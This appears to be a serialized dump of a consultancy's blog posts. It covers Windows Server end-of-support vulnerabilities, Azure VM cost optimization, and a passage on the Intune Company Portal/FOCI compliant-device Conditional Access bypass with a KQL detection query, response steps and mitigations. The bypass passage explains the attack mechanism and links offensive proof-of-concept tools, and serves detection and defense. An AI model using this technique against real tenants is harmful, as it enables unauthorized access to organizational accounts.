center;","1.142",[443,6611,6612],{"style":6608},"2.240",[426,6614,424,6615,424,6618,424,6622,420],{},[443,6616,6617],{},"Critical",[443,6619,6621],{"style":6620},"text-align: center; color: red;","35",[443,6623,6624],{"style":6620},"47",[426,6626,424,6627,424,6629,424,6632,420],{},[443,6628,4748],{},[443,6630,6631],{"style":6608},"806",[443,6633,6634],{"style":6608},"1.457",[12,6636,6637],{},[6638,6639,6640],"small",{},"Data as of September 2024, with a growing number of vulnerabilities month-over-month",[12,6642,6643],{},"As of September 2024, Windows Server 2012 R2 is missing 1,142 vulnerabilities (see bullet point 1), which remain unaddressed or unpatched. This number is steadily growing month over month, with 35 classified as critical and 806 as high severity (see bullet point 2).",[12,6645,6646],{},"The situation is even more concerning for Windows Server 2008 R2, with an even larger number of known vulnerabilities. This creates an inviting opportunity for attackers, giving them a clear path to potential compromises.",[12,6648,6649],{},"This data is sourced from Microsoft Defender for Endpoint, which provides a comprehensive overview and valuable insights into system vulnerabilities.",[12,6651,6652],{},[2642,6653],{"alt":6654,"src":6655},"Microsoft Defender for Endpoint Vulnerabilities","https://res.cloudinary.com/c4a8/image/upload/blog/pics/defender-portal-vulnerabilites.png",{"title":65,"searchDepth":111,"depth":111,"links":6657},[6658,6659,6660,6661,6665,6666,6667],{"id":6382,"depth":111,"text":6383},{"id":6394,"depth":111,"text":6395},{"id":6423,"depth":111,"text":6424},{"id":6456,"depth":111,"text":6457,"children":6662},[6663,6664],{"id":6462,"depth":329,"text":6463},{"id":6486,"depth":329,"text":6487},{"id":6527,"depth":111,"text":6528},{"id":6555,"depth":111,"text":6556},{"id":6576,"depth":111,"text":6577},{"lang":2171,"seoTitle":6376,"titleClass":2173,"date":6669,"categories":6670,"blogtitlepic":6671,"socialimg":6672,"customExcerpt":6673,"keywords":6341,"contactInContent":6674,"hreflang":6692,"scripts":6697},"2024-10-17",[2176],"head-end-of-support","/blog/heads/head-end-of-support.jpg","Would you trust an airplane with critical failures to get you safely to your destination? Then why trust your Windows Server 2012 R2 to keep your business secure? With over 35 critical vulnerabilities, running end-of-life systems could be your organization's greatest risk. Discover how to protect your infrastructure before it’s too late – because in today’s threat landscape, there’s no room for error.",{"quote":2168,"infos":6675},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":6676,"level":41,"textStyling":2204,"flush":2205,"person":6677,"form":6681},"Would you like to learn more about End-of-Life (EOL) and End-of-Support (EOS) systems? Feel free to reach out! We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":6678},[6679,6680],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":6682,"method":2169,"action":2216,"fields":6683},{"skin":2215},[6684,6685,6686,6687,6688,6690,6691],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":6689},"Request EOS EOL Systems",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[6693,6695],{"lang":2260,"href":6694},"/blog/security/2024/10/end-of-support-operating-systems-de",{"lang":2263,"href":6696},"/blog/security/2024/10/end-of-support-operating-systems-es",{"slick":2181,"form":2181},"/posts/2024-10-17-end-of-support-operating-systems",{"title":6376,"description":65},"posts/2024-10-17-end-of-support-operating-systems",[6702,6703,6704,6705,6706],"Cyber Security","Windows Server","Security Risk","Vulnerability Management","Security Score","gjgtYVh9nyhWhkTN-15QwMTcyhVJZl-ZpRC9LJAI6t0",{"id":6709,"title":6710,"author":6711,"body":6712,"cta":2166,"description":6718,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6987,"moment":6989,"navigation":2181,"path":7001,"seo":7002,"stem":7003,"tags":7004,"webcast":2168,"__hash__":7007},"content_en/posts/2024-11-11-vm-cost-optimization-on-azure.md","How to Keep Your Azure VM Costs Under Control",[2510],{"type":9,"value":6713,"toc":6977},[6714,6719,6722,6726,6728,6731,6734,6748,6754,6758,6760,6763,6774,6777,6780,6789,6798,6802,6804,6807,6811,6813,6816,6819,6827,6833,6841,6846,6855,6861,6865,6867,6870,6878,6883,6891,6902,6910,6926,6930,6932,6935,6949,6955,6958,6961,6966,6969,6971,6974],[12,6715,6716],{},[251,6717,6718],{},"\"Why Are My Virtual Machines (VMs) in Azure So Expensive? I Thought the Cloud Was Supposed to Be Cheaper!\"",[12,6720,6721],{},"This is a statement we frequently hear from customers—especially those who have migrated their IT infrastructure to the cloud using a \"lift & shift\" approach without making any adjustments. Without proper optimization, the cloud can indeed end up being more costly than expected.",[41,6723,6725],{"id":6724},"do-you-even-need-a-vm","Do You Even Need a VM?",[12,6727,31],{},[12,6729,6730],{},"This is the first question to ask: Is a VM truly necessary for the task at hand, or could a cloud-native service like Azure Functions or a Kubernetes cluster be a better fit?",[12,6732,6733],{},"That said, there are valid reasons to stick with a VM:",[1254,6735,6736,6739,6742,6745],{},[1257,6737,6738],{},"Requirements set by software vendors",[1257,6740,6741],{},"Lack of expertise within the organization to transition applications",[1257,6743,6744],{},"Staff shortages",[1257,6746,6747],{},"Other specific needs",[12,6749,6750,6751,6753],{},"So, how can costs be optimized when a VM is unavoidable?",[531,6752],{},"\nHere are some effective strategies.",[41,6755,6757],{"id":6756},"the-biggest-cost-drivers-for-vms","The Biggest Cost Drivers for VMs",[12,6759,31],{},[12,6761,6762],{},"The cost of VMs in Azure is primarily influenced by the following factors:",[1254,6764,6765,6768,6771],{},[1257,6766,6767],{},"Runtime",[1257,6769,6770],{},"Assigned SKU (Virtual Machine Size)",[1257,6772,6773],{},"Operating system licenses",[12,6775,6776],{},"The bulk of the expense comes from the resources consumed during runtime. As long as a VM is active and utilizing CPU and RAM resources, costs accrue—whether the VM is fully utilized or idle. When a VM is turned off, charges are reduced to the storage used.",[12,6778,6779],{},"Each VM in Azure is tied to a specific SKU, which defines its configuration in terms of CPU and RAM. Different SKUs are optimized for different use cases, such as a high CPU-to-RAM ratio for compute-intensive tasks.",[12,6781,6782,6783,6785,6788],{},"The SKU name typically reveals its configuration.",[531,6784],{},[251,6786,6787],{},"Example:"," A VM in the D-series is designed for a balanced ratio of CPU to RAM, typically 4 GB of RAM per CPU core. For instance, Standard_D4s_v5 offers 4 CPU cores and 16 GB of RAM. The \"s\" denotes support for premium SSD storage.",[12,6790,6791,6792,6797],{},"Microsoft provides a ",[2672,6793,6796],{"href":6794,"rel":6795},"https://learn.microsoft.com/en-us/azure/virtual-machines/sizes/overview?tabs=breakdownseries%2Cgeneralsizelist%2Ccomputesizelist%2Cmemorysizelist%2Cstoragesizelist%2Cgpusizelist%2Cfpgasizelist%2Chpcsizelist",[2676],"comprehensive list"," of all available SKUs, complete with detailed performance metrics.",[41,6799,6801],{"id":6800},"how-to-optimize-vm-costs","How to Optimize VM Costs",[12,6803,31],{},[12,6805,6806],{},"To reduce VM costs, focus on the following areas:",[186,6808,6810],{"id":6809},"resource-allocation","Resource Allocation",[12,6812,47],{},[12,6814,6815],{},"The first key question: Is the current VM assigned to the optimal SKU?",[12,6817,6818],{},"This can be determined by reviewing the VM metrics in the Azure portal. It may reveal that the chosen VM size is oversized, or that the resources are fully utilized only during certain periods, leaving the VM idle for much of the month. Perhaps the VM is assigned to the wrong SKU series, and an option with more RAM per CPU core would be more suitable.",[12,6820,6821,6824,6826],{},[251,6822,6823],{},"Example: Intermittent Usage",[531,6825],{},"\nA typical scenario might involve monthly billing runs in an ERP system. The VM is heavily utilized once a month for processing invoices but is otherwise used sporadically for less intensive data queries.",[12,6828,6829,6832],{},[251,6830,6831],{},"Solution:"," Scale the VM down to a smaller SKU for most of the month and temporarily scale it up during billing cycles. Azure makes it easy to adjust VM sizes within the same series with minimal downtime.",[12,6834,6835,6838,6840],{},[251,6836,6837],{},"Example: Wrong SKU",[531,6839],{},"\nAnother scenario: An application requires 64 GB of RAM but only 4 CPU cores. If the VM is mistakenly configured as Standard_D16s_v5, it includes 16 CPU cores—far more than needed.",[12,6842,6843,6845],{},[251,6844,6831],{}," Switching to a SKU like Standard_E8-4s_v5 would provide the same 64 GB of RAM with only 4 CPU cores.",[12,6847,6848,6849,6854],{},"Using the ",[2672,6850,6853],{"href":6851,"rel":6852},"https://azure.microsoft.com/en-us/pricing/calculator/",[2676],"Azure Pricing Calculator",", you can quickly identify potential savings. The difference could exceed $500 per month.",[12,6856,6857],{},[2642,6858],{"alt":6859,"src":6860},"VM Cost Comparison","https://res.cloudinary.com/c4a8/image/upload/blog/pics/vm-cost-optimization.png",[186,6862,6864],{"id":6863},"optimizing-vm-runtime","Optimizing VM Runtime",[12,6866,47],{},[12,6868,6869],{},"In the cloud, VMs incur costs based on active CPU and RAM usage. On-premises, VMs often ran 24/7 since it had little impact on costs. In the cloud, however, it’s worth asking: Does the VM need to run 24/7?",[12,6871,6872,6875,6877],{},[251,6873,6874],{},"Example: 12/5 Usage",[531,6876],{},"\nConsider a VM whose application isn’t used overnight or on weekends. Continuous availability isn’t necessary.",[12,6879,6880,6882],{},[251,6881,6831],{}," Schedule the VM to shut down during non-business hours. Just remember to account for update management to avoid security risks. Azure Automation Accounts can automate VM start and stop schedules.",[12,6884,6885,6888,6890],{},[251,6886,6887],{},"Example: 24/7 Usage",[531,6889],{},"\nSome systems, such as domain controllers, must be available around the clock to respond to users, clients, and servers.",[12,6892,6893,6895,6896,6901],{},[251,6894,6831],{}," For such cases, ",[2672,6897,6900],{"href":6898,"rel":6899},"https://azure.microsoft.com/en-us/pricing/reserved-vm-instances/?msockid=11c5d32a1e116e2101f6c6241ff16ff8",[2676],"Azure Reserved Instances"," are ideal. Organizations commit to a fixed amount of compute resources for 1–3 years at a discounted rate. Billing can be monthly or upfront, and Reserved Instances can often be applied to other VMs of the same SKU when available.",[12,6903,6904,6907,6909],{},[251,6905,6906],{},"Example: Upcoming Modernization",[531,6908],{},"\nSometimes, VMs are still needed while a transition to cloud-native services like Azure Functions or Kubernetes is being planned. If the migration is expected within three months, Reserved Instances might not be worthwhile.",[12,6911,6912,5449,6914,6919,6920,6925],{},[251,6913,6831],{},[2672,6915,6918],{"href":6916,"rel":6917},"https://learn.microsoft.com/en-us/azure/cost-management-billing/savings-plan/savings-plan-compute-overview",[2676],"Azure Savings Plan"," offers flexibility. Similar to Reserved Instances, it spans 1–3 years but covers a broader range of ",[2672,6921,6924],{"href":6922,"rel":6923},"https://azure.microsoft.com/en-us/pricing/offers/savings-plan-compute/#Select-services",[2676],"Azure services",". Companies commit to spending a set amount per hour, receiving discounted rates on eligible services up to that limit. Costs exceeding the commitment are billed at standard rates.",[186,6927,6929],{"id":6928},"licenses","Licenses",[12,6931,47],{},[12,6933,6934],{},"Operating system licenses are often overlooked in cost optimization. By default, Azure provides a rental license for the OS when creating a VM. However, many organizations already own licenses.",[12,6936,6937,6940,6942,6943,6948],{},[251,6938,6939],{},"Solution: Azure Hybrid Benefit",[531,6941],{},"\nWith ",[2672,6944,6947],{"href":6945,"rel":6946},"https://azure.microsoft.com/en-us/pricing/hybrid-benefit/?msockid=11c5d32a1e116e2101f6c6241ff16ff8#features",[2676],"Azure Hybrid Benefit",", existing licenses, such as Windows Server, can be applied to Azure VMs.",[12,6950,6951],{},[2642,6952],{"alt":6953,"src":6954},"Azure Hybrid Benefit Windows Server","https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure_hybrid_benefit_ms_picture_windows_server.png",[12,6956,6957],{},"This option isn’t limited to Windows but also applies to other licensed systems like Red Hat, SUSE Enterprise, and Microsoft SQL Server.",[12,6959,6960],{},"Using existing licenses in Azure has specific requirements. Once met, simply enable the Hybrid Benefit in the VM settings to unlock savings. A quick comparison of VMs with and without Hybrid Benefit highlights the cost advantage.",[12,6962,6963],{},[2642,6964],{"alt":6947,"src":6965},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure-hybrid-benefit.png",[12,6967,6968],{},"It’s worth exploring whether your existing licenses qualify for Azure Hybrid Benefit.",[41,6970,4287],{"id":4286},[12,6972,6973],{},"Careful resource allocation, targeted runtime optimization, and leveraging existing licenses are key steps to reducing costs. It’s also worthwhile to evaluate alternatives to VMs and consider cloud-native services. Tools like the Azure Pricing Calculator, Azure Automation, and options such as Azure Hybrid Benefit help maintain clarity and identify savings opportunities.",[12,6975,6976],{},"For long-term success in the cloud, continuously assess and optimize your infrastructure while balancing cost and value.",{"title":65,"searchDepth":111,"depth":111,"links":6978},[6979,6980,6981,6986],{"id":6724,"depth":111,"text":6725},{"id":6756,"depth":111,"text":6757},{"id":6800,"depth":111,"text":6801,"children":6982},[6983,6984,6985],{"id":6809,"depth":329,"text":6810},{"id":6863,"depth":329,"text":6864},{"id":6928,"depth":329,"text":6929},{"id":4286,"depth":111,"text":4287},{"lang":2171,"seoTitle":6988,"titleClass":2173,"date":6989,"categories":6990,"blogtitlepic":6991,"socialimg":6992,"customExcerpt":6993,"keywords":6994,"hreflang":6995,"scripts":7000},"Optimize Azure VM Costs: Top Tips and Strategies","2024-11-11",[4232],"head-vm-cost-optimization","/blog/heads/head-vm-cost-optimization.jpg","Virtual Machines (VMs) in Azure can be more expensive than expected, especially without proper optimization. This article shows you how to cut costs by selecting the right VM SKU, optimizing runtimes, and leveraging existing licenses effectively. With the right strategies, you can make your cloud expenses more efficient in the long run.","Azure VM costs, cloud cost optimization, virtual machines, Azure SKU, Azure Hybrid Benefit, cloud-native services, cost optimization Azure, VM runtime optimization, Azure Reserved Instances, Azure Automation",[6996,6998],{"lang":2260,"href":6997},"/blog/azure/2024/11/vm-cost-optimization-on-azure",{"lang":2263,"href":6999},"/blog/azure/2024/11/vm-cost-optimization-on-azure-es",{"slick":2181,"form":2181},"/posts/2024-11-11-vm-cost-optimization-on-azure",{"title":6710,"description":6718},"posts/2024-11-11-vm-cost-optimization-on-azure",[7005,6211,7006],"Azure Automation","Azure Cost Optimization","UEpPO9pXeVSWtkmZmp-ibyRnZqgC7Yy2MTR852-3IMw",{"id":7009,"title":7010,"author":7011,"body":7012,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":7630,"moment":7632,"navigation":2181,"path":7656,"seo":7657,"stem":7658,"tags":7659,"webcast":2168,"__hash__":7663},"content_en/posts/2025-01-14-compliant-device-bypass.md","Compliant Device Bypass - All you need to know!",[2494,2373,2530],{"type":9,"value":7013,"toc":7613},[7014,7018,7020,7070,7074,7076,7088,7095,7106,7112,7115,7119,7121,7125,7127,7130,7132,7192,7195,7198,7202,7204,7208,7210,7225,7232,7235,7238,7240,7243,7246,7249,7257,7268,7271,7273,7276,7280,7282,7285,7290,7294,7296,7299,7302,7305,7449,7453,7455,7458,7497,7501,7503,7510,7513,7516,7530,7533,7536,7589,7597,7599,7601,7604,7607,7610],[41,7015,7017],{"id":7016},"what-happened-so-far","What happened so far?",[12,7019,31],{},[1254,7021,7022,7043,7058,7067],{},[1257,7023,7024,7025,7030,7031,7036,7037,7042],{},"In December 2024 ",[2672,7026,7029],{"href":7027,"rel":7028},"https://x.com/TEMP43487580",[2676],"Yuya Chudo"," gave his talk “",[2672,7032,7035],{"href":7033,"rel":7034},"https://www.blackhat.com/eu-24/briefings/schedule/#unveiling-the-power-of-intune-leveraging-intune-for-breaking-into-your-cloud-and-on-premise-42176",[2676],"Unveiling the Power of Intune: Leveraging Intune for Breaking Into Your Cloud and On-Premise","” at the Black Hat Europe conference. In this session he showed how to abuse a hardcoded rarely known exclusion in Conditional Access (CA) for device compliance in combination with the undocumented “",[2672,7038,7041],{"href":7039,"rel":7040},"https://github.com/secureworks/family-of-client-ids-research",[2676],"FOCI-Feature","” in Entra ID. In the talk he also presented the response from Microsoft MSRC (VULN-123240) that this behavior is by design and required for successful Intune Enrollment of new devices.",[1257,7044,7045,7046,7051,7052,7057],{},"Some days after the conference Sunny Chau published the proof-of-concept tool ",[2672,7047,7050],{"href":7048,"rel":7049},"https://github.com/JumpsecLabs/TokenSmith",[2676],"TokenSmith"," including a ",[2672,7053,7056],{"href":7054,"rel":7055},"https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/",[2676],"companion blog posts"," - what made the technique available for a broader audience.",[1257,7059,7060,7061,7066],{},"In addition, a ",[2672,7062,7065],{"href":7063,"rel":7064},"https://github.com/zh54321/PoCEntraDeviceComplianceBypass/blob/main/poc_entra_compliance_bypass.ps1",[2676],"PoC written in PowerShell"," has been published.",[1257,7068,7069],{},"Since the end of December, we at glueckkanja AG have been investigating how to prevent and detect this technique. In this blog post we would like to share some of our insights regarding the attack and discuss mitigation and detection options.",[41,7071,7073],{"id":7072},"tldr","TL;DR",[12,7075,31],{},[12,7077,7078,7079,7084,7085],{},"There are some resources with a built-in exclusion to specific Grant Controls/Conditions in Conditional Access to solve certain problems. One of them is the exclusion of the Company Portal App for Device Compliance to solve the chicken-egg-problem to get devices enrolled in Intune before they are considered compliant. This behavior is ",[2672,7080,7083],{"href":7081,"rel":7082},"https://learn.microsoft.com/en-us/entra/identity/conditional-access/policy-alt-all-users-compliant-hybrid-or-mfa#:~:text=You%20can%20enroll,Company%20Portal%20application",[2676],"documented here",".\n",[251,7086,7087],{},"This means you can get access and refresh token for this app from an unmanaged device even if a CA policy is enforcing Device Compliance for “All resources”.",[12,7089,7090,7094],{},[2642,7091],{"alt":7092,"src":7093},"image.png","https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-02.png","{: .post__screenshot}",[12,7096,7097,7098,7102,7103],{},"Microsoft has implemented a feature called Family of Client IDs (FOCI) which allows a group of Microsoft OAuth client applications to obtain access tokens as any other client in the family using their refresh token. A behavior otherwise not allowed in the OAuth2 standard. Read the ",[2672,7099,7101],{"href":7039,"rel":7100},[2676],"original work of Secureworks"," for more details.\n",[251,7104,7105],{},"Since the Company Portal App is a “family member” the requested Refresh Tokens for it can be used to get tokens for other apps in the family.",[12,7107,7108,7109],{},"The FOCI feature is limited and the consent between the client id and the resource must be explicitly configured and granted. In the case of the Company Portal App this consent has been granted, among others, for access to Microsoft Graph using a restricted scope and to the Azure AD Graph API with the permission of the current user.\n",[251,7110,7111],{},"This means a Company Portal refresh token can be used to obtain e.g. Azure AD Graph API access tokens with the scope user_impersonation, allowing us to do a lot of things with eg. AADInternals or ROADrecon",[12,7113,7114],{},"To execute the attack, the attacker requires either valid credentials of the victim as well as the ability to perform MFA if this is required by Conditional Access or a valid refresh token.",[41,7116,7118],{"id":7117},"what-risk-and-blast-radius-exists","What risk and blast radius exists?",[12,7120,31],{},[186,7122,7124],{"id":7123},"which-of-the-possible-resources-scopes-are-affected-from-the-compliance-exclusion","Which of the possible resources (scopes) are affected from the compliance exclusion?",[12,7126,47],{},[12,7128,7129],{},"The Attacker has the option to request tokens for another FOCI application as already described before. However, Microsoft has implemented a bypass for the device compliance requirements only for accessing tokens to certain resource applications various API permission scope. In particular, the following delegated API permissions are sensitive and of interest to attackers:",[2127,7131,6585],{},[417,7133,7134,7147],{},[422,7135,7136],{},[426,7137,7138,7141,7144],{},[430,7139,7140],{},"Resource Application",[430,7142,7143],{},"Application Id",[430,7145,7146],{},"Delegated Permission Scope",[438,7148,7149,7160,7171,7182],{},[426,7150,7151,7154,7157],{},[443,7152,7153],{},"AADGraph",[443,7155,7156],{},"00000002-0000-0000-c000-000000000000",[443,7158,7159],{},"user_impersonation",[426,7161,7162,7165,7168],{},[443,7163,7164],{},"Microsoft Graph API",[443,7166,7167],{},"00000003-0000-0000-c000-000000000000",[443,7169,7170],{},"“email\", \"openid\", \"profile\",\"Device.Read.All\", \"DeviceManagementConfiguration.Read.All\", \"DeviceManagementConfiguration.ReadWrite.All\", \"ServicePrincipalEndpoint.Read.All\", \"User.Read”",[426,7172,7173,7176,7179],{},[443,7174,7175],{},"Device Registration Service",[443,7177,7178],{},"01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9",[443,7180,7181],{},"adrs_access",[426,7183,7184,7187,7190],{},[443,7185,7186],{},"Windows Azure Service Management API",[443,7188,7189],{},"797f4846-ba00-4fd7-ba43-dac1f8f63013",[443,7191,7159],{},[12,7193,7194],{},"Since the granted permissions are not for the application itself, the impact depends on the privileges of the caller (user account) and which delegated permission scopes are authorized to execute API calls on the scope.",[12,7196,7197],{},"Let us have a closer look at the criticality of the shown delegated permission scope and potential authorization to call sensitive APIs?",[41,7199,7201],{"id":7200},"which-privileges-and-delegated-scope-are-critical","Which privileges and delegated scope are critical?",[12,7203,31],{},[186,7205,7207],{"id":7206},"azure-ad-graph-api","Azure AD Graph API",[12,7209,47],{},[12,7211,7212,7213,7218,7219,7224],{},"The legacy programmatic interface offers many APIs to manage directory settings and objects in Entra ID (Azure AD). This includes Conditional Access policies, directory roles, CRUD on groups and devices and operations on the signed-in user, such as change password. A full list of all supported operations can be found in the ",[2672,7214,7217],{"href":7215,"rel":7216},"https://learn.microsoft.com/en-us/previous-versions/azure/ad/graph/api/api-catalog",[2676],"Azure AD Graph API reference",". This API will be fully retired on June 30, 2025 (based on ",[2672,7220,7223],{"href":7221,"rel":7222},"https://learn.microsoft.com/en-us/graph/migrate-azure-ad-graph-overview",[2676],"Microsoft latest announcements",").",[12,7226,7227,7228,7231],{},"The assigned delegated scope “user_impersonation” allows the application (in this case, Company Portal) to act on behalf of the user. So, every permission that the signed-in user has to an Entra object, scope or directory-level can be used as authorization in the API calls. The user might be the owner of an Entra ID object (application, group, or other objects), or they might be assigned permissions through Entra ID role assignments. ",[251,7229,7230],{},"In the case of active high privileged role assignments, this would allow the attacker to modify objects or compromise the tenant",". At least, even without any privileges, default user permissions can be used for extensive reconnaissance and enumeration of directory objects in the tenant.",[12,7233,7234],{},"Therefore, the scenarios and impact to abuse the Azure AD Graph API depends on the active or permanent assigned privileges of the affected user. APIs to access Microsoft 365 services (e.g., for exfiltration of OneDrive) are not included in Azure AD Graph.",[186,7236,7164],{"id":7237},"microsoft-graph-api",[12,7239,47],{},[12,7241,7242],{},"In comparison to Azure AD Graph, the delegated scope to Microsoft Graph API is restricted to a certain scope. Alongside OpenID scopes (openid, email, profile) and basic read operations on behalf of the user (ServicePrincipalEndpoint.Read.All, User.Read).",[12,7244,7245],{},"List and read of all device objects can be achieved by calling “device” endpoint in Microsoft Graph with default permissions by using “Device.Read.All\". This could help attackers to gain insights of device objects.",[12,7247,7248],{},"In case of a compromised user with assignment to “Intune Administrator” or any delegation in Microsoft Intune RBAC, the following granted delegated API permission should be considered problematic:",[1254,7250,7251,7254],{},[1257,7252,7253],{},"”DeviceManagementConfiguration.Read.All”",[1257,7255,7256],{},"“DeviceManagementConfiguration.ReadWrite.All”",[12,7258,7259],{},[251,7260,7261,7262,7267],{},"Those delegated permissions allow CRUD operations, for example on Device Compliance and Configuration Policies but also deployment of ",[2672,7263,7266],{"href":7264,"rel":7265},"https://learn.microsoft.com/en-us/graph/api/intune-shared-devicemanagementscript-create?view=graph-rest-beta",[2676],"Management Scripts"," for further malicious activity on target devices.",[186,7269,7175],{"id":7270},"device-registration-service",[12,7272,47],{},[12,7274,7275],{},"With this permission the attacker is able to join or register a device to Entra ID. In turn this would allow them to even enroll the device in Intune and depending on the Intune configuration get a valid and compliant to device to access even more protected services.",[186,7277,7279],{"id":7278},"other-foci-applications","Other FOCI applications",[12,7281,47],{},[12,7283,7284],{},"Requesting access to other privileged interfaces, for example Azure Resource Manager API is in scope of FOCI and interests of the attacker well. However, this resource is still protected and not bypassed to the Conditional access grant control “compliant device”.",[12,7286,7287],{},[2642,7288],{"alt":7092,"src":7289},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-03.png",[41,7291,7293],{"id":7292},"can-we-detect-this-attack-technique","Can we detect this attack technique?",[12,7295,31],{},[12,7297,7298],{},"As described above, the greatest risk comes from access to MS Graph and Azure AD Graph.",[12,7300,7301],{},"Since the application ID of the Microsoft Intune Company Portal App is always used in this case, the main task for creating a detection is to exclude legitimate use by e.g. device registrations, which according to our observation consists of which resources are accessed first in a session → in case of an attack usually MS Graph or Azure AD Graph.",[12,7303,7304],{},"Here is a working detection that we tested in several environments different sizes:",[52,7306,7307,7308,3935,7310,3940,7312,7314,7317,540,7319,7321,540,7325,3935,7327,7329,7330,540,7333,7335,540,7338,3935,7340,7342,7343,7345,540,7348,3935,7350,7352,7353,1402,7356,805,7359,7362,7363,3935,7365,7367,7368,7370,540,7373,3935,7375,1402,7378,7380,7381,7383,7384,7386,7387,540,7389,7383,7391,7394,7395,7398,7399,7401,7402,7367,7405,7407,540,7410,3935,7412,7414,7415,3935,7417,7419,7420,540,7422,7424,540,7426,3935,7428,7329,7430,540,7432,7434,540,7437,3935,7439,7352,7441,1402,7443,805,7445,7362,7447],{"style":3931},"\nAADSignInEventsBeta ",[531,7309],{},[102,7311,3939],{"style":3938},[102,7313,3944],{"style":3943},[102,7315,7316],{"style":3947},"7d",[102,7318,1288],{"style":3943},[531,7320],{},[102,7322,7324],{"style":7323},"color: #75715E;","// Access to Microsoft Intune Company Portal",[531,7326],{},[102,7328,3939],{"style":3938}," ApplicationId == ",[102,7331,7332],{"style":3958},"@\"9ba1a5c7-f17a-4de9-a1f1-6178c8d51223\"",[531,7334],{},[102,7336,7337],{"style":7323},"// From non joined/registered device",[531,7339],{},[102,7341,3939],{"style":3938}," isempty(AadDeviceId) ",[531,7344],{},[102,7346,7347],{"style":7323},"// Used to access resource Microsoft Graph or Windows Azure Active Directory",[531,7349],{},[102,7351,3939],{"style":3938}," ResourceId ",[102,7354,7355],{"style":3938},"in",[102,7357,7358],{"style":3958},"\"00000002-0000-0000-c000-000000000000\"",[102,7360,7361],{"style":3958},"\"00000003-0000-0000-c000-000000000000\"",") ",[531,7364],{},[102,7366,4089],{"style":3938}," SessionId ",[531,7369],{},[102,7371,7372],{"style":7323},"// Find the initial logon event based on the session Id",[531,7374],{},[102,7376,7377],{"style":3938},"join kind=inner",[531,7379],{},"\n    AADSignInEventsBeta ",[531,7382],{},"\n    | ",[102,7385,3939],{"style":3938}," ErrorCode == ",[102,7388,808],{"style":3947},[531,7390],{},[102,7392,7393],{"style":3938},"summarize arg_min(","Timestamp, *",[102,7396,7397],{"style":3938},") by"," SessionId)",[531,7400],{},"\n    ",[102,7403,7404],{"style":3938},"on",[531,7406],{},[102,7408,7409],{"style":7323},"// Ignore trusted and managed devices",[531,7411],{},[102,7413,3939],{"style":3938}," isempty(DeviceTrustType) ",[531,7416],{},[102,7418,3939],{"style":3938}," IsManaged != ",[102,7421,839],{"style":3947},[531,7423],{},[102,7425,7324],{"style":7323},[531,7427],{},[102,7429,3939],{"style":3938},[102,7431,7332],{"style":3958},[531,7433],{},[102,7435,7436],{"style":7323},"// when the first requested resource is Microsoft Graph or Windows Azure Active Directory",[531,7438],{},[102,7440,3939],{"style":3938},[102,7442,7355],{"style":3938},[102,7444,7358],{"style":3958},[102,7446,7361],{"style":3958},[531,7448],{},[41,7450,7452],{"id":7451},"how-should-we-respond-when-we-detect-suspicious-activities","How should we respond when we detect suspicious activities?",[12,7454,31],{},[12,7456,7457],{},"Initialize your incident response process using a defined playbook which contains:",[1254,7459,7460,7480,7488,7491,7494],{},[1257,7461,7462,7463],{},"Hunting for suspicious or anomalous activity by the compromised user\n",[1254,7464,7465,7471,7474,7477],{},[1257,7466,7467,7468],{},"Summary of non-interactive sign-in to Resource Applications including IP addresses and UserAgents based on ",[63,7469,7470],{},"sessionId",[1257,7472,7473],{},"Check if Microsoft Entra Audit Logs shown critical operations by the user or IP addresses (e.g., added credentials to owned app registrations)",[1257,7475,7476],{},"Identify if the user has registered devices in the affected session",[1257,7478,7479],{},"Check Intune audit logs for operations by application “Company Portal” and the affected user",[1257,7481,7482,7483],{},"Hunting for related alerts by the impacted entities\n",[1254,7484,7485],{},[1257,7486,7487],{},"Lookup for entities in the AlertEvidence table to identify other alerts based on SessionId, IP Addresses and User",[1257,7489,7490],{},"Identify criticality of the user (by privileges) in Exposure Management",[1257,7492,7493],{},"Review of hunting results and verify if the action was legitimate as part of a device enrollment.",[1257,7495,7496],{},"Identity the initial access vector and reset the users’ credentials and when needed devices.",[41,7498,7500],{"id":7499},"can-we-mitigate-the-attack","Can we mitigate the attack?",[12,7502,31],{},[12,7504,7505,7506,7509],{},"Since the configured exclusion is required for Intune enrollment, ",[251,7507,7508],{},"there is no mitigation that would not break other parts of Microsoft 365",". Access to the Azure AD Graph resource cannot be scoped or blocked directly. Any Conditional Access policy using “Block” as grant control will prevent access but might have other implications.",[12,7511,7512],{},"But for mitigation it is crucial to understand that this Conditional Access bypass is not a complete attack. It is a technique which as a step allows a range of attacks.",[12,7514,7515],{},"An attack path could be",[3259,7517,7518,7521,7524,7527],{},[1257,7519,7520],{},"Account Compromise via Phishing and AiTM",[1257,7522,7523],{},"Conditional Access Bypass",[1257,7525,7526],{},"Reconnaissance using e.g. ROADrecon, GraphRunner or AADInternals",[1257,7528,7529],{},"Lateral Movement, Privilege Escalation or Persistence through a newly registered device enrolled in Intune",[12,7531,7532],{},"Since we are not able to mitigate the Conditional Access bypass without breaking Intune enrollment, it is more than reasonable to implement mitigations at the other steps off the attack path and also implement reasonable detections.",[12,7534,7535],{},"To reduce the probability and impact we suggest increasing the strengths of other controls and implement the following soon:",[1254,7537,7538,7544,7550,7556,7562,7577,7583],{},[1257,7539,7540,7543],{},[251,7541,7542],{},"Enforce MFA for “All Users” and “All Cloud Apps” through Conditional Access."," If you only enforce Device Compliance Single Factor Authentication is enough with this technique.",[1257,7545,7546,7549],{},[251,7547,7548],{},"Do not use Device Compliance or MFA in your rulesets, 